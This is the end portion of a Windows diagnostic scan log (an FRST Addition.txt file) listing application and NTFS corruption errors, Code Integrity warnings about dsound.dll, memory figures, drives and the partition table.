Error: (12/31/2015 09:51:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056
Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1
Exception code: 0xc0000135
Fault offset: 0x0009d4f2
Faulting process id: 0x1ac4
Faulting application start time: 0xUMonit64.exe0
Faulting application path: UMonit64.exe1
Faulting module path: UMonit64.exe2
Report Id: UMonit64.exe3
Faulting package full name: UMonit64.exe4
Faulting package-relative application ID: UMonit64.exe5

System errors:
=============
Error: (01/01/2016 12:02:09 PM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

Error: (01/01/2016 11:30:12 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

Error: (01/01/2016 11:19:24 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ALLOCATION".

Error: (01/01/2016 11:19:20 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

Error: (01/01/2016 11:14:18 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

Error: (01/01/2016 10:45:01 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ALLOCATION".

Error: (01/01/2016 10:44:43 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

Error: (01/01/2016 10:30:08 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

Error: (01/01/2016 10:28:47 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (01/01/2016 10:19:36 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block.

CodeIntegrity:
===================================
Date: 2015-12-22 19:54:59.725
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 21:24:57.634
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 21:24:56.466
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 21:24:55.296
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 20:58:41.685
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 20:55:35.952
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 20:55:34.628
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-08-12 20:55:33.232
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-02-26 18:49:17.365
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4200U CPU @ 1.60GHz
Percentage of memory in use: 29%
Total physical RAM: 6045.1 MB
Available physical RAM: 4232.28 MB
Total Virtual: 7005.1 MB
Available Virtual: 4953.86 MB

==================== Drives ================================

Drive c: (Windows8_OS) (Fixed) (Total:891.47 GB) (Free:831.97 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:22.64 GB) NTFS
Drive e: (melanie fernande) (CDROM) (Total:0.5 GB) (Free:0 GB) UDF
Drive f: () (Removable) (Total:1.86 GB) (Free:0.78 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1F826A6C)
Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 1.9 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=1.9 GB) - (Type=0B)

==================== End of Addition.txt ============================